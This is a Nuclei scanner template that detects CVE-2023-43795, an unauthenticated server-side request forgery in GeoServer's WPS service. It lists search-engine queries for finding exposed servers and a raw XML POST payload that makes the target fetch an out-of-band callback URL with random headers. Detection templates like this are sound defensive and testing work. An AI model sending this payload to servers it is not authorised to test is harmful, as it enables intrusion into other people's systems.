GeoServer WPS - Server Side Request Forgery

id: CVE-2023-43795

info:
  name: GeoServer WPS - Server Side Request Forgery
  author: DhiyaneshDK
  severity: critical
  description: |
    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
  reference:
    - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43795
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43795
    cwe-id: CWE-918
    epss-score: 0.13101
    epss-percentile: 0.9552
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"GeoServer"
      - http.title:"geoserver"
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
      - title="geoserver"
    google-query: intitle:"geoserver"
  tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"
  value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <wps:Execute version="1.0.0" service="WPS"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns="http://www.opengis.net/wps/1.0.0"
          xmlns:wfs="http://www.opengis.net/wfs"
          xmlns:wps="http://www.opengis.net/wps/1.0.0"
          xmlns:ows="http://www.opengis.net/ows/1.1"
          xmlns:gml="http://www.opengis.net/gml"
          xmlns:ogc="http://www.opengis.net/ogc"
          xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
          xmlns:xlink="http://www.w3.org/1999/xlink"
                xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
          <ows:Identifier>JTS:area</ows:Identifier>
          <wps:DataInputs>
            <wps:Input>
              <ows:Identifier>geom</ows:Identifier>
              <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
                <wps:Header key="{{string}}" value="{{value}}"/>
              </wps:Reference>
            </wps:Input>
          </wps:DataInputs>
          <wps:ResponseForm>
            <wps:RawDataOutput>
              <ows:Identifier>result</ows:Identifier>
            </wps:RawDataOutput>
          </wps:ResponseForm>
        </wps:Execute>

    payloads:
      path:
        - /wms
        - /geoserver/wms

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
          - status_code == 200
        condition: and
# digest: 490a0046304402203454d2f353de8b311b53f58885926aa14e79392ea0e4bf552c2653c214124ab9022070dc6c40140eb259e30e78f2a0c155725eabcf398c1a5f6ddbe6abf389ddc712:922c64590222798bb761d5b6d8e72950